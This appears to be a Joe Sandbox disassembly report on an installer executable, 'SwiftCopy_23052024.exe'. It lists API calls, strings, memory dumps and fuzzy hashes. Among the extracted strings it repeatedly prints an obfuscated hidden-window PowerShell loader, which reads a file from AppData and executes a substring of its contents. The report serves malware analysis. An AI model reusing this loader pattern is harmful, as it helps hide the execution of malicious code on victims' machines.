CharNextA.USER32(?,"C:\Users\user\Desktop\SwiftCopy_23052024.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403223,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062C1
CharPrevA.USER32(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403223,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062D1

Strings

"C:\Users\user\Desktop\SwiftCopy_23052024.exe", xrefs: 00406293
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00406258
*?|<>/":, xrefs: 0040629F

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\SwiftCopy_23052024.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
API String ID: 589700163-3466205250
Opcode ID: a4ab23b94a56fbb4e4ab915d6a0181bd243ee2e30b5e95404a857257d08c8b81
Instruction ID: c458f316ef597d28f2da60d7b579c442bef5f501f0b3efb69703b1c7b5c33328
Opcode Fuzzy Hash: a4ab23b94a56fbb4e4ab915d6a0181bd243ee2e30b5e95404a857257d08c8b81
Instruction Fuzzy Hash: 2211E25180479129FB3226280C44FB77F984B9B770F1901BFD4C6722C2C67C5CA6826D

Function 004040E2 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 004040FF
GetSysColor.USER32(00000000), ref: 0040413D
SetTextColor.GDI32(?,00000000), ref: 00404149
SetBkMode.GDI32(?,?), ref: 00404155
GetSysColor.USER32(?), ref: 00404168
SetBkColor.GDI32(?,?), ref: 00404178
DeleteObject.GDI32(?), ref: 00404192
CreateBrushIndirect.GDI32(?), ref: 0040419C

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
Instruction ID: 7e7a0635a9a9ad053635d0a61e184563e53fd5caf941e55c08cb8fd0a55be6c0
Opcode Fuzzy Hash: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
Instruction Fuzzy Hash: 312195715007049BD7309F68DD0CB5BBBF4AF91710B048A2EEA96A62E4C738D894CB54

Function 0040206A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00402095

Part of subcall function 00405114: lstrlenA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,00000000,007969E3,771B23A0,?,?,?,?,?,?,?,?,?,00403133,00000000,?), ref: 0040514D
Part of subcall function 00405114: lstrlenA.KERNEL32(00403133,Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,00000000,007969E3,771B23A0,?,?,?,?,?,?,?,?,?,00403133,00000000), ref: 0040515D
Part of subcall function 00405114: lstrcatA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,00403133,00403133,Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,00000000,007969E3,771B23A0), ref: 00405170
Part of subcall function 00405114: SetWindowTextA.USER32(Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg), ref: 00405182
Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020A5
GetProcAddress.KERNEL32(00000000,?), ref: 004020B5
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040211F

Strings

/z, xrefs: 004020DF
"$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)", xrefs: 004020E9

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)"$/z
API String ID: 2987980305-2145358791
Opcode ID: 316733a321260e70c8ceb3086e55fb46f9f9e051d62d5e924b1e41132ca5ac71
Instruction ID: e61536644f3bf68f7d9d9aba667bc4080f9c9cd2ba15b67bd91c869db9746c0c
Opcode Fuzzy Hash: 316733a321260e70c8ceb3086e55fb46f9f9e051d62d5e924b1e41132ca5ac71
Instruction Fuzzy Hash: 6521C671900214ABCF11BFA4CF89AAE7AB4AF45318F20413BF601B62D1D6FD4982965E

Function 004049CE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049E9
GetMessagePos.USER32 ref: 004049F1
ScreenToClient.USER32(?,?), ref: 00404A0B
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404A1D
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A43

Strings

f, xrefs: 00404A1F

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
Instruction ID: eb4189dc51e804bfd071b7650a20f4023a9ce92a25ebde304762d3f5d63b5794
Opcode Fuzzy Hash: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
Instruction Fuzzy Hash: A7019271E40218BADB00DB94DD81FFEBBBCAF55711F10012BBA00B61C0C7B455018F94

Function 00402CDD Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402CF8
MulDiv.KERNEL32(0008784B,00000064,000884C8), ref: 00402D23
wsprintfA.USER32 ref: 00402D33
SetWindowTextA.USER32(?,?), ref: 00402D43
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402D55

Strings

verifying installer: %d%%, xrefs: 00402D2D

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: d2fd7c2642e66b568f2ec6ad1d9ac2acf8620bf8fd7d34c9c6364c2149bd0d5f
Instruction ID: 93681796157c975abd13c8aaf7f83402805495348c169d35143c581ed88c076c
Opcode Fuzzy Hash: d2fd7c2642e66b568f2ec6ad1d9ac2acf8620bf8fd7d34c9c6364c2149bd0d5f
Instruction Fuzzy Hash: 3001FF71640209BBEF109F60DE4AFEE3769EB04345F00803AFA16B51D0DBB999568F59

Function 004055DA Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 0040561D
GetLastError.KERNEL32 ref: 00405631
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405646
GetLastError.KERNEL32 ref: 00405650

Strings

C:\Users\user\Desktop, xrefs: 004055DA
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405600

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-2752704311
Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
Instruction ID: 74ab278e8dc0014e3bb1a2534afc1f4e11ab1799ac02ec3fccaeb9b03a53458b
Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
Instruction Fuzzy Hash: 42011A71C00619EADF009FA1D944BEFBBB8EF14354F00843AD549B6290D77996498FA9

Function 004027A3 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00030600,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027F7
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402813
GlobalFree.KERNEL32(?), ref: 0040284C
GlobalFree.KERNEL32(00000000), ref: 0040285F
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402877
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040288B

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 0982fd8cd03af43de4d89f950c9e5981b86a3d1c62601019d2fd9277b0c3e0b0
Instruction ID: 0817f1a76f2754a18340a64afdb33fa8ea80ebf39b88600e0ebdbe9b4451bd6d
Opcode Fuzzy Hash: 0982fd8cd03af43de4d89f950c9e5981b86a3d1c62601019d2fd9277b0c3e0b0
Instruction Fuzzy Hash: C3217C71C00124ABDF217FA9CD49DAE7F79EF09364B10823AF520762E1CA7959429F98

Function 00401D41 Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401D58
GetClientRect.USER32(?,?), ref: 00401D9F
LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DCD
SendMessageA.USER32(?,00000172,?,00000000), ref: 00401DDD
DeleteObject.GDI32(00000000), ref: 00401DF4

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: e74d55128d179c98adf795825d74efced26243928de525b9452fddc54a0fc75a
Instruction ID: 73b34c0ea56e2209ca6b10ab4d69fe2665be34d6bb8fccc5b8c3de89ec824b9e
Opcode Fuzzy Hash: e74d55128d179c98adf795825d74efced26243928de525b9452fddc54a0fc75a
Instruction Fuzzy Hash: E8216672D00109AFDB05DF98DE44AEE7BB5FB48300F10407AF945F62A1CB789941CB58

Function 00401DFF Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E02
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
MulDiv.KERNEL32(00000000,00000000), ref: 00401E24
ReleaseDC.USER32(?,00000000), ref: 00401E35
CreateFontIndirectA.GDI32(0040B7E8), ref: 00401E84

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 5d1ffa01871f5db8f89dd87cba1715f9ad3535b2ea098c1f20dc9bef4fe14ff5
Instruction ID: 7256709fe02f9cd86de6692cc41f874bddf10922414536e302f1c0253df40f98
Opcode Fuzzy Hash: 5d1ffa01871f5db8f89dd87cba1715f9ad3535b2ea098c1f20dc9bef4fe14ff5
Instruction Fuzzy Hash: 3901B571900342AFE7019BB1AE49B997FB4EB55304F104439F251BB1E3CBB800059B6D

Function 004048C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0079F548,0079F548,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047DF,000000DF,00000000,00000400,?), ref: 00404962
wsprintfA.USER32 ref: 0040496A
SetDlgItemTextA.USER32(?,0079F548), ref: 0040497D

Strings

%u.%u%s%s, xrefs: 0040494C

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

